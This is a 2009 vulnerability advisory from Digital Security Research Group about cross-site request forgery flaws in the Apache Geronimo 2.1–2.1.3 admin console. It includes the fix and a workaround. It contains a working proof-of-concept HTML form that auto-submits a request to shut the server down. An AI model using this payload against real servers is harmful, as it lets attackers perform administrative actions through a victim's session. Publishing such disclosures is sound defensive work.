Services Vulnerabilities Exploits Publications News Blog About DSecRG


[DSECRG-09-020] Apache Geronimo - Multiple XSRF vulnerabilities

Various cross-site request forgery (XSRF or CSRF) vulnerabilities were identified in the Apache Geronimo web administration console.

Application: Apache Geronimo Application Server
Versions Affected: 2.1 - 2.1.3
Vendor URL: http://geronimo.apache.org/
Bug: Multiple XSRF Vulnerabilities
Exploits: YES
Reported: 10.12.2008
Vendor response: 10.12.2008
Solution: YES
Date of Public Advisory: 16.04.2009
CVE-number: 2009-0039
Author: Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)


Description
***********

This affects all full JavaEE Geronimo releases or other distributions which include the administration web console up to and including Geronimo 2.1.3.



Details
*******

Exploiting this issue may allow a remote attacker to perform certain administrative actions, e.g. change web administration password, upload applications, etc using predictable URL requests once a user has authenticated and obtained a valid session with the server.

Example [Shutdown Server]:

<html>
<form action='http://[server]/console/portal//Server/Shutdown/__ac0x3console-base0x2ServerManager!-1172254814|0' id=1>
<input type=hidden value='Shutdown' name="shutdown">
<input type=submit>
</form>
</html>
<script>
document.getElementById(1).submit();
</script>



Solution
********

These security vulnerabilities were fixed in Geronimo 2.1.4 release.

New version of Geronimo 2.1.4 can be downloaded from this location:

http://geronimo.apache.org/downloads.html

An alternative workaround (if you choose to not upgrade to Apache Geronimo 2.1.4) would be to stop or undeploy the administration web console application in the server.

Credits
*******

http://geronimo.apache.org/21x-security-report.html#2.1.xSecurityReport-214



About
*****

Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards.
Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.

Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com
http://www.dsec.ru
Vulnerabilities RSS RSS
21.03.2012
[DSECRG-12-019] vCenter Orchestrator - password disclosure
22.02.2012
[DSECRG-12-018] Oracle Application Server - multiple security vulnerabilities
17.02.2012
[DSECRG-12-017] ASUS Net4Switch ipswcom.dll ActiveX - buffer overflow vulnerability

17.02.2012
[DSECRG-12-016] SAP MessagingSystem - information disclosure
17.02.2012
[DSECRG-12-014] SAP Internet Sales - XSS
17.02.2012
[DSECRG-12-015] SAP Adapter Monitor - information disclosure
Vulnerabilities list


© 2002—2013, ERPScan
For quoting or using materials from this site
link is obligatory

+44 (20) 81334493    e-mail: research@dsecrg.com
Rss: Vulnerabilities, Exploits, News, Publications, Summary
Search